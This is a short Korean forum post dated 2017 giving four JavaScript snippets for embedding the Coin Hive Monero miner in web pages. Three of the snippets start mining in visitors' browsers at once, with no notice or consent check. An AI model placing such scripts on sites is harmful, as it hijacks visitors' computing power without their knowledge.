커뮤니티

분류1

컴퓨터

제목

코인 하이브로 모네로 가상화폐 채굴하기

COMO MINERAR MONERO(XMR)

 

 

 

 

 

1.

 

<script src="https://authedmine.com/lib/authedmine.min.js"></script>

<script>

var miner = new CoinHive.Anonymous('<site-key>', {throttle: 0.3});

 

// Only start on non-mobile devices and if not opted-out

// in the last 14400 seconds (4 hours):

if (!miner.isMobile() && !miner.didOptOut(14400)) {

miner.start();

}

</script>

 

 

 

 

2.

 

<script src="https://coinhive.com/lib/coinhive.min.js"></script>

<script>

var miner = new CoinHive.Anonymous('<site-key>',{

threads: 2,

});

miner.start();

</script>

 

 

3.

 

<script src="https://coin-hive.com/lib/coinhive.min.js"></script>

 

<script>

 

var miner = new CoinHive.Anonymous('<site-key>',{

 

threads: 1

 

});

 

miner.start();

 

</script>

 

 

4.

 

<script src="https://coin-hive.com/lib/coinhive.min.js"></script>

 

<script>

 

var miner = new CoinHive.Anonymous('<site-key>',{

 

threads: 1,

 

throttle: 0.8

 

});

 

miner.start();

 

</script>

 

0

추천하기

0

반대하기

첨부파일 다운로드

등록자naver21

등록일2017-02-02

조회수1,661

  • 페이스북 공유
  • 트위터 공유
  • 인쇄하기
 
거친 말, 욕설, 모욕 등은 삭제 처리될 수 있습니다.
댓글로 인해 상처받는 분이 없도록 서로 예의를 지켜 주시기 바랍니다. ~ ♬
스팸방지코드 :
번호제목등록자등록일조회수
26컴퓨터 데이터 분석

Python

2017.08.021,841
25컴퓨터 lxml 설치 하기

Python

2017.08.021,773
24컴퓨터 크롬 드라이버 설치 하기

Python

2017.08.023,590
23컴퓨터 urllib.request 코드 테스트

Python

2017.08.021,958
22컴퓨터 Requests 모듈 설치

Python

2017.07.311,583
21컴퓨터 Beautifulsoup 설치 하기

Python

2017.07.301,686
20컴퓨터 Phantomjs 다운 로드 하기

Python

2017.07.301,747
19컴퓨터 파이썬 Selenium 설치 하기

Python

2017.07.302,098
18컴퓨터 프로그래밍 무료 동영상 강좌

Python

2017.07.291,578
17컴퓨터 Notepad ++ 다운

Python

2017.07.281,525